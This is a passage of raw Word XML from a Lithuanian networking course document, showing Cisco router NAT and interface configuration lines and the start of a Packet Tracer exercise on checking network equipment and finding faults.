    <w:p w14:paraId="4573E987" w14:textId="32241841" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="066A143E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#ip nat inside source list FOR-NAT interface gig 0/0 overload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6CDF2D" w14:textId="32241841" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="066A143E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC06964" w14:textId="39E5436F" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43986088" w14:textId="32768281" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="002E4AA5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nustatome m</w:t>
      </w:r>
      <w:r w:rsidR="066A143E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>aršrutizatori</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="066A143E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(Router1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C0616" w14:textId="0B2D2D4C" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65971C49" w14:textId="5CA2F7E5" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="066A143E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A02AC5" w14:textId="04939AA5" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="066A143E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 213.234.10.1 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8123D1" w14:textId="1A064F44" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="066A143E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC5232" w14:textId="0F33DB57" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="066A143E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ip address 213.234.20.1 255.255.255.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDDC5E1" w14:textId="2062F589" w:rsidR="088148D5" w:rsidRPr="005A5C28" w:rsidRDefault="3849AF2E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">PC0 192.168.2.2/24, PC1 192.168.2.3/24, PC2 192.168.2.4/24, </w:t>
      </w:r>
      <w:r w:rsidR="1849A8D3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Web serveris - </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Server0 192.168.3.2/24, Server1 213.234.20.2/30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9010BB" w14:textId="77777777" w:rsidR="008F6F4E" w:rsidRPr="005A5C28" w:rsidRDefault="008F6F4E" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243C1322" w14:textId="5E6F4AA9" w:rsidR="49684B16" w:rsidRPr="005A5C28" w:rsidRDefault="64C0A7D2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B28863" w14:textId="27D6D8D7" w:rsidR="003D17F0" w:rsidRPr="005A5C28" w:rsidRDefault="5F67883F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuring Router and Switch Devices </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://www.cisco.com/c/en/us/td/docs/security/security_management/cs-mars/4-3/user/guide/local_controller/cfgrtrsw.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144A5D23" w14:textId="77777777" w:rsidR="009E6FE6" w:rsidRPr="005A5C28" w:rsidRDefault="009E6FE6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70426243" w14:textId="0BA59493" w:rsidR="009E6FE6" w:rsidRPr="005A5C28" w:rsidRDefault="1796C750" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="6DA15B31" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="39B73FD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="39B73FD4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44C07E5D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>PATIKRINTI TINKLO ĮRANG</w:t>
      </w:r>
      <w:r w:rsidR="13D35659" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">OS </w:t>
      </w:r>
      <w:r w:rsidR="00CA2314" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>FUNKCIONAVI</w:t>
      </w:r>
      <w:r w:rsidR="00CA2314" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>MĄ</w:t>
      </w:r>
      <w:r w:rsidR="2DAF1CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>, NUSTATYTI SUTRIKIMUS</w:t>
      </w:r>
      <w:r w:rsidR="00F81B33" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A3C287" w14:textId="7836F324" w:rsidR="00F81B33" w:rsidRPr="005A5C28" w:rsidRDefault="56787DA6" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
        </w:rPr>
        <w:t>UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jums p</w:t>
      </w:r>
      <w:r w:rsidR="5C29B6E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ateikta</w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00041CDC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">programos Cisco Packet Tracer </w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tinklo simuliacijos schem</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00041CDC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>atikrin</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ar</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">veikia </w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vis</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinklo įranga,</w:t>
      </w:r>
      <w:r w:rsidR="2D423EA3" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ar </w:t>
      </w:r>
      <w:r w:rsidR="00E643C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>vietin</w:t>
      </w:r>
      <w:r w:rsidR="6D723144" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iame tinkle</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="136DC0AC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>interneto ryšys</w:t>
      </w:r>
      <w:r w:rsidR="281FCF0A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="42CBE295" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5A687C86" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nustaty</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>kite tinklo sutrikimus ir jų priežasti</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="60917D6F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738610EB" w14:textId="26DDA9AE" w:rsidR="0001674F" w:rsidRPr="005A5C28" w:rsidRDefault="3691BD86" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79ED7CDF" wp14:editId="6700D00A">
            <wp:extent cx="5550796" cy="3151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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1399" t="17056" r="46345" b="19063"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5550796" cy="3151576"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220C672" w14:textId="69C5E165" w:rsidR="00B8587F" w:rsidRPr="005A5C28" w:rsidRDefault="1178EF88" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 pav. Cisco Packet Tracer simuliacija</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A4058" w14:textId="32963A90" w:rsidR="1A924C31" w:rsidRPr="005A5C28" w:rsidRDefault="2E681B6D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Šaltinis: L. Tokranov</w:t>
      </w:r>
      <w:r w:rsidR="47659F87" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D02BF20" w14:textId="67159CEF" w:rsidR="171451CB" w:rsidRPr="005A5C28" w:rsidRDefault="171451CB" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A23C6C6" w14:textId="6334843D" w:rsidR="009336D8" w:rsidRPr="005A5C28" w:rsidRDefault="285619D0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tinklinės įrangos konfigūravimo nustatymai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969DE82" w14:textId="2A6D6B7C" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Žinomi duomenys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533537D" w14:textId="1C02E648" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>VLAN2 - administravimas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44778167" w14:textId="1E48C141" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>VLAN3 - Vartotojai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0591C265" w14:textId="4699D9EC" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>VLAN4 - serveriai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F1293C" w14:textId="1D326692" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Filialas - 192.168.6.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2946B94F" w14:textId="2DB2E6A7" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>DNS - 192.168.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55F913" w14:textId="79270A58" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>FTP serveris - 192.168.4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD71B69" w14:textId="59A2725E" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0900C67E" w14:textId="3DD73CAB" w:rsidR="27E3DE1D" w:rsidRPr="005A5C28" w:rsidRDefault="58102969" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Portalas:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="08EEC400" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
